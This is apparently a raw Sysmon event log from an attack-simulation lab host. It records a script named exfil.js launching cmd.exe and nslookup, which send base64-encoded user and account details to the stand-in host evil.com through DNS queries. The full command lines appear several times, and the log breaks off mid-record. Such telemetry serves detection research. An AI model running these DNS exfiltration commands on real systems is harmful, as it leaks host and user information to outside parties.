10341000x8000000000000000212313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.538{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0145-000000005F02}7592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.538{2E1864BB-18E0-629A-6742-000000005F02}39767340C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-0145-000000005F02}7592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.542{2E1864BB-18F5-629A-0145-000000005F02}7592C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcefds.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.538{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldwu.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.522{2E1864BB-18F5-629A-FF44-000000005F02}43365472C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0045-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.507{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.507{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.507{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.507{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.507{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0045-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.507{2E1864BB-18F5-629A-FE44-000000005F02}26321152C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-0045-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.519{2E1864BB-18F5-629A-0045-000000005F02}4284C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-FE44-000000005F02}2632C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldwu.tmp 2>&1 10341000x8000000000000000212301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.491{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-FF44-000000005F02}4336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.491{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-FF44-000000005F02}4336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.491{2E1864BB-18F5-629A-FF44-000000005F02}43365472C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-FE44-000000005F02}2632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.491{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-FF44-000000005F02}4336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.488{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.488{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.487{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.487{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.487{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-FE44-000000005F02}2632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.487{2E1864BB-18E0-629A-6742-000000005F02}39765012C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-FE44-000000005F02}2632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.487{2E1864BB-18F5-629A-FE44-000000005F02}2632C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldwu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.469{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxsya.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.454{2E1864BB-18F5-629A-FC44-000000005F02}37647336C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-FD44-000000005F02}3872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.454{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.454{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.454{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.454{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.454{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-FD44-000000005F02}3872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.454{2E1864BB-18F5-629A-FB44-000000005F02}58848136C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-FD44-000000005F02}3872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.463{2E1864BB-18F5-629A-FD44-000000005F02}3872C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-FB44-000000005F02}5884C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 